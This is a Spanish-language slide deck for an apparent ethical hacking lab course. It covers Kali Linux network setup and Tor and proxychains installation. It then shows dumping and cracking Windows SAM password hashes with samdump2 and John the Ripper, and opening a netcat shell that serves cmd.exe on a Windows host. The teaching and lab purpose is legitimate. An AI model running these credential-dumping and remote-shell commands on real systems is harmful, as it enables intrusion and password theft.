14
INSTALAR KALI LINUX

Linux

Embed Size (px)

DESCRIPTION

Instalar kali Linux

Citation preview

  • INSTALAR KALI LINUX

  • ifconfigifconfig eth0

    ifconfig eth0 192.168.14.110 netmask 255.255.255.0(ping 192.168.14.1)

    route add default gw 192.168.14.1(route)

    echo nameserver 200.48.0.37 > /etc/resolv.conf(ping www.google.com)

  • vi cibertec_ip.sh

    #!/bin/bashifconfig eth0 192.168.14.110 netmask 255.255.255.0

    route add default gw 192.168.14.1echo nameserver 200.48.0.37 > /etc/resolv.conf

    chmod +x cibertec_ip.sh

  • vi /etc/network/interfaces

    auto eth0iface eth0 inet static

    address 192.168.14.113netmask 255.255.255.0gateway 192.168.14.1

    (:wq)

    vi /etc/resolv.confNameserver 200.48.0.37

    (:wq)

    /etc/init.d/networking restartifconfig eth0 up

  • GUIA DE LINUX

  • apt-get install torapt-get install vidalia

  • wget http://192.168.14.100/cb/proxychains-3.1.tar.gz

    compilar proxychains:tar zxvf proxychains-3.1.tar.gz

    cd proxychains-3.1 ./configure

    make make install

  • WINDOWS/system32/config/systemWINDOWS/system32/config/SAM

    cd Desktopwget http://192.168.14.100/cb/systemwget http://192.168.14.100/cb/SAM

    bkhive system syskey.txtsamdump2 SAM syskey.txt > hashes.txt

    cat hashes.txt

    john hashes.txt --format=nt2john hashes.txt --format=nt2 show

    http://objectif-securite.ch/en/ophcrack.php

  • service ssh statusservice ssh start

    ssh [email protected]

  • al servidorscp OWASP.pdf [email protected]:/root/Desktopscp -r viajealsur/ [email protected]:/www/sitio/fotos

    del servidorscp [email protected]:/root/Desktop/prueba.txt /root/

    scp -r [email protected]:/www/sitio/fotos/viajealsur /root/

  • Localicen el archivo nc.exe en su kali

  • locate nc.exefind / | grep nc.exe

    Copien el archivo nc.exe a su windows (1 punto!)

  • smbclient

    smbclient -U Ethical-Sab -L 192.168.14.xxsmbclient -U Ethical-Sab '\\192.168.14.xx\Ethical-Sab'

    put nc.exe

  • nc -lp 4444 (windows)nc -v 172.16.89.130 4444 (bactrack)

    nc 192.168.1.1 80GET / HTTP/1.0

    (conectividad con puertos!)

    nc -lp 4444 -e cmd.exe (windows)nc -v 172.16.89.130 4444

    Diapositiva 1Diapositiva 2Diapositiva 3Diapositiva 4Diapositiva 5Diapositiva 6Diapositiva 7Diapositiva 8Diapositiva 9Diapositiva 10Diapositiva 11Diapositiva 12Diapositiva 13Diapositiva 14